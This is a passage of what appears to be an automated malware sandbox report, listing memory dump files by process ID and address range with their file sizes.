                            • memory/2840-262-0x00000000002C0000-0x0000000000306000-memory.dmp
                              Filesize

                              280KB

                            • memory/2844-276-0x0000000002110000-0x0000000002112000-memory.dmp
                              Filesize

                              8KB

                            • memory/2844-271-0x0000000000000000-mapping.dmp
                            • memory/2864-208-0x000000000038AB6B-mapping.dmp
                            • memory/2864-207-0x0000000000380000-0x00000000003C0000-memory.dmp
                              Filesize

                              256KB

                            • memory/2864-261-0x0000000000380000-0x00000000003C0000-memory.dmp
                              Filesize

                              256KB

                            • memory/2924-292-0x0000000000000000-mapping.dmp
                            • memory/2924-296-0x00000000002E0000-0x0000000000310000-memory.dmp
                              Filesize

                              192KB

                            • memory/2924-297-0x0000000000400000-0x00000000004CE000-memory.dmp
                              Filesize

                              824KB

                            • memory/2924-298-0x0000000004A51000-0x0000000004A52000-memory.dmp
                              Filesize

                              4KB

                            • memory/2924-299-0x0000000004A52000-0x0000000004A53000-memory.dmp
                              Filesize

                              4KB

                            • memory/2924-300-0x0000000004A53000-0x0000000004A54000-memory.dmp
                              Filesize

                              4KB

                            • memory/2924-301-0x0000000004A54000-0x0000000004A56000-memory.dmp
                              Filesize

                              8KB

                            • memory/2948-281-0x0000000000260000-0x0000000000280000-memory.dmp
                              Filesize

                              128KB

                            • memory/2948-280-0x0000000140000000-0x0000000140763000-memory.dmp
                              Filesize

                              7.4MB

                            • memory/2948-278-0x00000001402F327C-mapping.dmp
                            • memory/2956-209-0x0000000000000000-mapping.dmp
                            • memory/2988-211-0x0000000000000000-mapping.dmp